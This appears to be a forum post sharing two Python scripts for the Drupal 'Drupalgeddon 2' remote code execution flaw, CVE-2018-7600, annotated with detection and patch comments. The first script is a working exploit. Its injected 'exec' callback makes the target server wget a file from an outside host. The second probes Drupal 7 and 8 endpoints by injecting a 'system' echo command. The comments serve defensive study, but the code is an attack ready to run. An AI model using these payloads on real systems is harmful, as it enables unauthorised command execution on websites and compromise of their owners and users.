Drupal 7/8 CVE-2018-7600 EXP
hallo !
Two Python scripts:
 EXP.py
Code:
#!/usr/bin/env
# NOTE(review): the shebang names no interpreter (`python` is missing after
# `env`), so the file only runs when started explicitly, e.g. `python EXP.py`.
import sys
import requests

# Proof-of-concept request for CVE-2018-7600 (Drupal Form API render-array
# injection through the user-register AJAX endpoint, Drupal 8 path). From a
# detection standpoint the request shape below is what log searches and WAF
# rules key on; the fix is the Drupal core security release for this CVE.
print ('################################################################')
print ('# Proof-Of-Concept for CVE-2018-7600')
print ('# by Vitalii Rudnykh')
print ('# Thanks by AlbinoDrought, RicterZ, FindYanot, CostelSalanders')
print ('# https://github.com/a2u/CVE-2018-7600')
print ('################################################################')
print ('Provided only for educational or information purposes\n')

# No trailing-slash normalisation: the string concatenations below assume
# `target` already ends with '/' (the form shown in the prompt example).
target = input('Enter target url (example: https://domain.ltd/): ')

# Detection: `user/register` requested with `element_parents=account/mail/%23value`
# (`%23` is '#') plus `ajax_form=1` and `_wrapper_format=drupal_ajax` -- a
# combination ordinary registration traffic does not produce.
url = target + 'user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax'
# The POST body smuggles render-array properties (`#post_render`, `#type`,
# `#markup`) in as form fields: `#post_render` names the callback (`exec`) and
# `#markup` the string that callback is invoked with. Here that string makes
# the web server fetch a remote text file, so an outbound request from the web
# tier to gist.githubusercontent.com right after such a POST is the host-side
# indicator to alert on.
payload = {'form_id': 'user_register_form', '_drupal_ajax': '1', 'mail[#post_render][]': 'exec', 'mail[#type]': 'markup', 'mail[#markup]': 'wget https://gist.githubusercontent.com/a2u/66680e1f4abac79d654424ffdb1b410d/raw/d417bbfa8137a1ef53124522a87b1ad1d2b8ec96/hello.txt'}

# No `timeout=` is passed, so a host that accepts the connection but never
# answers blocks the script indefinitely.
r = requests.post(url, data=payload)
# Weak oracle: only the HTTP status code is inspected. A 200 alone does not
# show the callback ran, and a non-200 does not show it did not.
if r.status_code != 200:
 sys.exit("Not exploitable")
# Verification is out-of-band: the operator is told to look for the fetched
# file at the site root rather than the script checking anything itself.
print ('\nCheck: '+target+'hello.txt')


Detection script.py
Code:
#!coding:utf-8
import requests
import re

# Scanner for CVE-2018-7600 against a fixed host list: probes the Drupal 7
# password-reset form and the Drupal 8 user-register AJAX endpoint and prints
# "pwn!!!" when the output of the injected `echo` shows up in the response.
# Both hosts below name pre-fix releases (7.57, 8.5.0); the mitigation is the
# Drupal core security release that addresses this CVE.
print ('###################################')
print ('### POC for drupal CVE-2018-7600')
print ('### by Monster5')
print ('###################################')
print ('\n')

# Brace literal, so this is a set, not a list: hosts are visited in arbitrary
# order and duplicate entries collapse. Both entries are private lab addresses.
check_host={
   'http://192.168.168.8/drupal-7.57/',
   'http://192.168.168.8/drupal-8.5.0/',
   
}

for host in check_host:
   # Normalise a missing trailing slash; `host[-1::]` is simply the last character.
   if host[-1::] != '/':
       host += '/'

   #checking drupal7
   print('\n'+'checking host: '+ host)
   print('checking drupal 7.x ......')

   # Step 1 (Drupal 7): request the password-reset form with render-array
   # properties injected through the `name` parameter (`%23` is '#').
   # Detection: `q=user/password` together with `%23post_render`, `%23markup`
   # or `%23type` in the query string.
   url = host+'?q=user/password&name[%23post_render][]=system&name[%23markup]=echo%20pwn!!!&name[%23type]=markup'
   data = {
       'form_id':'user_pass',
       '_triggering_element_name':'name'
   }
   # verify=False disables TLS certificate validation (requests warns with an
   # InsecureRequestWarning on https hosts); timeout=5 caps each probe at 5s.
   r = requests.post(url,data = data,verify = False,timeout = 5)

   # The form_build_id returned in the page ties the poisoned form state to
   # the follow-up request below.
   result = re.search(r'<input type="hidden" name="form_build_id" value="([^"]+)" />', r.text)

   if result:
       found = result.group(1)
       # Step 2: hit the file/ajax callback with that form_build_id; presumably
       # this re-renders the cached form, which is where the injected `system`
       # callback fires. Detection: a POST to `file/ajax/name/%23value/<id>`.
       url = host + '?q=file/ajax/name/%23value/'+found
       data = {'form_build_id' : found}
       r = requests.post(url,data = data,verify = False,timeout = 5)

       # Verdict is a bare substring test: any response body containing "pwn"
       # is reported as vulnerable, so false positives are possible.
       if 'pwn' in r.text:
           print('pwn!!!'+'\n'+host)
       else:
           print('fail')
   else:
       print('fail')


   #checking drupal8
   print('\n'+'checking drupal 8.x ......')
   # Drupal 8 variant: the same render-array trick via `#lazy_builder`
   # (callback `system`, argument `echo pwn!!!`). The `(None, value)` tuples
   # make requests send these as multipart form parts (see `files=` below).
   payload = {
   'mail[a][#lazy_builder][0]':(None,'system'),
   'mail[a][#lazy_builder][1][]':(None,'echo pwn!!!'),
   'form_id':(None,'user_register_form')
   }

   # Header identifying the POST as an AJAX request.
   headers = {'X-Requested-With': 'XMLHttpRequest'}

   # Detection: `user/register` with `element_parents=account/mail/%23value`,
   # `ajax_form=1` and `_wrapper_format=drupal_ajax` in the query string.
   url = host+'user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax'    
   r = requests.post(url,files = payload, headers = headers,verify = False,timeout = 5)

   # Same substring oracle as the Drupal 7 branch (note the double space is
   # harmless to the parser).
   if  'pwn' in r.text:
       print('pwn!!!'+'\n'+host)
   else:
       print('fail')